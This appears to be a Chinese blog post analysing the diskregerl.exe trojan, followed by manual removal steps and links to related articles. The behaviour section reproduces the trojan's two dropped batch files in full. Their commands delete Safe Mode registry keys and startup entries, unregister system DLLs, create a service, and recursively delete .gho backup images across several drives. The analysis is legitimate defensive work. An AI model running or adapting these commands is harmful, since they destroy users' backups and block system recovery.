文件名稱:diskregerl.exe
文件大小:45,056 字節
AV命名:Trojan.Agent.cdt
加殼方式:UPX
編寫語言:VC
文件MD5:e98a4571cf72b798077d12d6c4894629
行爲分析:
1、拷貝文件:
C:\windows\system32\diskregerl.exe 45,056 字節
2、無添加啓動項舉動。
3、釋放2個批處理:
內容分別爲:
22483
17213
25187
6133
22690
25373
date 2004-08-17
19477
time 20:00:00
ping 127.0.0.1 -n 5
sc.exe create diskregerl BinPath= "C:\windows\system32\diskregerl.exe -kills" type= own type= interact start= auto DisplayName= diskregerl Programnot
sc.exe description diskregerl 創建網絡連接2
regsvr32.exe /u /s scrrun.dll
regsvr32.exe /u /s shimgvw.dll
regsvr32.exe /u /s itss.dll
regsvr32.exe /u /s vbscript.dll
regsvr32.exe /s jscript.dll
reg.exe delete HKLM\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318} /F
reg.exe delete HKLM\SYSTEM\ControlSet001\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318} /F
reg.exe delete HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318} /F
reg.exe delete HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318} /F
reg.exe delete HKLM\Software\Microsoft\Windows\CurrentVersion\Run /F
23413
sc.exe start diskregerl
del "C:\WINDOWS\Media\Windows XP 開始.wav"
del "C:\WINDOWS\Media\Windows XP 信息欄.wav"
del "C:\WINDOWS\Media\Windows XP 彈出窗口已阻止.wav"
regsvr32.exe /s C:\windows\system32\Programnot.dll
ping 127.0.0.1 -n 6
del "C:\Documents and Settings\孤獨更可靠\桌面\oky.exe" /F
22483
17213
date 2008-04-02
time 08:21:33
del %0
exit
第二個:
25187
6133
226902537319477
2819720092
404
ping 127.0.0.1 -n 16
13539
cmd.exe /c del /f /s /q c:*.gho
6752
cmd.exe /c del /f /s /q d:*.gho
31772
cmd.exe /c del /f /s /q e:*.gho
12028
cmd.exe /c del /f /s /q f:*.gho
8720
cmd.exe /c del /f /s /q g:*.gho
10731
cmd.exe /c del /f /s /q h:*.gho
8840
cmd.exe /c del /f /s /q i:*.gho
11736
regsvr32.exe /s C:\windows\system32\Programnot.dll
del %0
exit
4、連接網站,刷流量:
http://www.xerty.cn/^^/300center.htm
5、另外該病毒可能惡意鎖定IE主頁,不過未實現。
解決方法:
1、重啓計算機。
2、刪除文件:
C:\windows\system32\diskregerl.exe
3、如果重啓後病毒無法刪除,請下載冰刃(該軟件可到down.45it.com下載),結束其進程。
diskregerl.exe(Trojan.Agent.cdt)病毒手動查殺
發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章
解密後綴phobos勒索病毒 解密成功
染血的精靈
2019-02-24 13:35:07
華爲3COM交換機防病毒策略
god9394
2019-02-24 13:04:19
詳細瞭解查殺病毒的技巧
lichenjing9
2019-02-23 14:06:52
新型病毒可躲過殺毒軟件 已感染7.5萬臺PC
jkxuser
2019-02-23 13:49:04
域內有個病毒,是由X軟件生成的,怎麼刪除?
Hack38
2019-02-23 13:22:24
ARP病毒的分析與防治
fengyinbo923
2019-02-23 13:16:22
txplatform.exe分析及病毒解決
smallCrab2009
2019-02-23 13:10:47
用winhex恢復被“生成與原文件夾相同名字的exe文件“病毒破壞的數據
傾角45度半
2019-02-23 00:23:45
針對企業無線局域網的一些簡單要求與建議~
xuqinyu521
2019-02-23 00:21:17
史上最牛的10大計算機病毒
喜歡寧靜
2019-02-23 00:13:16
【原創:讓我們一起踏上***的征途】——第二課 病毒在我電腦裏幹了什麼?
sinauc
2019-02-22 23:45:19
mravsc32.exe簡單分析(魔波病毒)
孤獨更可靠
2019-02-22 23:37:07
你的公司有如下的症狀嗎?
lzw119
2019-02-22 23:19:16